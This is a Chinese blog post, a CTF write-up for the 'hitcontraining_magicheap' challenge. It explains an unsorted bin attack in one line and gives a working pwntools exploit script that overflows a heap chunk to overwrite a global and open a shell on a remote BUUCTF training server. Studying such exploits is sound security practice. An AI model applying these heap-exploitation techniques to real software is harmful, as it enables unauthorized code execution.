【unstored bin attack】hitcontraining_magicheap

最新推荐文章于 2022-02-13 18:41:08 发布
最新推荐文章于 2022-02-13 18:41:08 发布
阅读量141 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/115711900
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

【unstored bin attack】

1.ida分析

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.思路

  • 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数

3.exp

from pwn import *
p = remote('node3.buuoj.cn',25879)
#p = process('./magicheap')
context.log_level = 'debug'
def add(size,cont):
	p.sendlineafter('Your choice :',str(1))
	p.sendlineafter('Size of Heap : ',str(size))
	if len(cont) == size:
		p.sendafter('Content of heap:',cont)
	else:
		p.sendlineafter('Content of heap:',cont)

def edit(index,size,cont):
	p.sendlineafter('Your choice :',str(2))
	p.sendlineafter('Index :',str(index))
	p.sendlineafter('Size of Heap : ',str(size))        
	if len(cont) == size:
                p.sendafter('Content of heap : ',cont)
        else:
                p.sendlineafter('Content of heap: ',cont)

def dele(index):
	p.sendlineafter('Your choice :',str(3))
	p.sendlineafter('Index :',str(index))
add(0x10,'a')#0
add(0x80,'b')#1
add(0x60,'c')#2
add(0x10,'d')#3
dele(1)
payload = 'b'*0x10 + p64(0) + p64(0x91) + p64(0) +p64(0x6020a0-16)
edit(0,len(payload),payload)
add(0x80,'dddd')
p.sendline('4869')
#gdb.attach(p)
p.interactive()
huzai9527
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastbin attack + unsorted bin attack+ heap overflow+ double free fastbin + double free unlink
qq_39869547的博客
10-27 372
0x1 fastbin依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针(倒数第二个chunk的fd,通常情况这个fd指向的是下一个chunk起始地址)。这个指针决定了下一次要分配的chunk地址。 也就是说默认分配最好一个chunk给用户使用,同时最后一个chunk也是我们一开始第一个free掉的 0x2 我们的目的修改某一个chunk的fd ,这样我们就可以任意地址分配我们...
hitcontraining magicheap
pondzhang的专栏
06-16 354
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
hitcontraining_magicheap
z1r0的博客
12-23 253
hitcontraining_magicheap 查看保护 magic <= 0x1305即可getshell。 edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remo
BUUCTF【hitcontraining_magicheap
weixin_51055545的博客
02-13 1669
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
Bin_count_8bit.rar_Bin_Count_bin_bin count
09-23
标题中的“Bin_count_8bit.rar”暗示了我们即将探讨的是与二进制计数,特别是8位二进制计数相关的内容。8位二进制计数在计算机科学和IT领域中非常重要,因为它是大多数现代计算机系统的基本数据单位。这里的“rar”...
RTKLIB_bin_2.3.3_b34
02-14
RTKLIB_bin 2.3.3 B34
Bin_Hex.rar_Bin_Hex.exe_Bin_Hex.exe下载_HEX BIN 转换_bin_hex_student
07-14
标题中的"Bin_Hex.rar"、"Bin_Hex.exe"以及"BIN HEX 转换"关键词提示我们,这是一个关于二进制(Binary)与十六进制(Hexadecimal)之间转换的软件工具。"Bin_Hex.exe"可能是这个软件的可执行文件,用户可以通过运行...
flink-1.15.1-bin-scala_2.12.tgz
08-15
flink-1.15.1-bin-scala_2.12.tgz
NICO_wincenk.bin_bin_
10-03
标题 "NICO_wincenk.bin_bin_" 暗示我们正在处理一个可能与软件或固件更新相关的二进制文件,可能是某种特定设备或系统的核心组成部分。描述 "Extract infos from NK.bin" 提示我们需要从名为 "NK.bin" 的二进制文件...
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1132
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 332
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
hitcontraining_magicheap buuctf
m0_57754423的博客
02-12 1251
这题的漏洞点在编辑heap: 可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。 我自己的思路是: 利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。 exp: from pwn import * p = remote("node4.buuoj.cn",25162) #p = process("./magicheap") e = ELF("./magicheap") sh_addr = 0x400c50 bss_addr
HITCON Training lab14——magic heap
04-19 431
64位程序,没开PIE  #Unsorted Bin Attack 先回顾一下 Unsorted Bin 的基本来源以及基本使用情况。 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,...
hitcontraining_heapcreator
m0sway的博客
01-07 2867
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 1011
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
ctf-pwn-patchelf-用题目给的libc运行二进制文件
huzai9527的博客
07-07 5253
用给定的libc进行调试 首先根据题目给你的libc,查找相应版本的连接器 然后去glibc-all-in-one中下载相应的ld文件 glibc-all-in-one安装步骤 https://github.com/matrix1001/glibc-all-in-one 使用 查看各unbuntu版本的glibc ./update_list cat list 下载对应版本的glibc ./download 2.27-3ubuntu1_amd64 下载好的glibc在l
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3696
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
IDA修复跳表
huzai9527的博客
11-08 1892
一、 IDA打开遇到JUMP CS命令 这是由于GCC在编译超过5个switch的结构时会用跳表进行优化,变成上面的样子 二、使用EDIT --> other --> specify switch 将光标打在JUMP命令上按TAB键切换到汇编,然后才能进行编辑 我解释一下各个参数的意义 Address of Jump table:跳表的地址,cmp eax 5,之后跳到的地址,这里就是0x69E0 Number of elements:switch 的个数,先前cmp eax 5,加
log_bin_trust_function_creators 变量。
最新发布
09-12
log_bin_trust_function_creators 是 MySQL 数据库中的一个系统变量,它用于控制是否信任函数创建者。如果该变量设置为 1,则 MySQL 将信任函数创建者,允许他们创建具有任意安全权限的函数。如果该变量设置为 0,则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值